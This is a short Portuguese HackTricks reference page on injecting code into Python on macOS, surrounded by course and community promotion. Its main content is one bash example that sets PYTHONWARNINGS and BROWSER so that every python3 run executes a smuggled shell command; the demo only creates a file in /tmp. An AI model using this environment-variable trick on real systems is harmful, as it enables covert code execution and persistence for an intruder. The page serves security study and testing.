# Injeção em Aplicações Python no macOS {% hint style="success" %} Aprenda e pratique Hacking na AWS:

[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)

\ Aprenda e pratique Hacking no GCP:

[**HackTricks Training GCP Red Team Expert (GRTE)**

](https://training.hacktricks.xyz/courses/grte)

Suporte ao HackTricks

* Verifique os [**planos de assinatura**](https://github.com/sponsors/carlospolop)! * **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Compartilhe truques de hacking enviando PRs para os repositórios** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).

{% endhint %} ## Através das variáveis de ambiente `PYTHONWARNINGS` e `BROWSER` É possível alterar ambas as variáveis de ambiente para executar código arbitrário sempre que o python for chamado, por exemplo: {% code overflow="wrap" %} ```bash # Generate example python script echo "print('hi')" > /tmp/script.py # RCE which will generate file /tmp/hacktricks PYTHONWARNINGS="all:0:antigravity.x:0:0" BROWSER="/bin/sh -c 'touch /tmp/hacktricks' #%s" python3 /tmp/script.py ``` {% endcode %} {% hint style="success" %} Aprenda e pratique AWS Hacking:

[**HackTricks Treinamento AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)

\ Aprenda e pratique GCP Hacking:

[**HackTricks Treinamento GCP Red Team Expert (GRTE)**

](https://training.hacktricks.xyz/courses/grte)

Apoie o HackTricks

{% endhint %}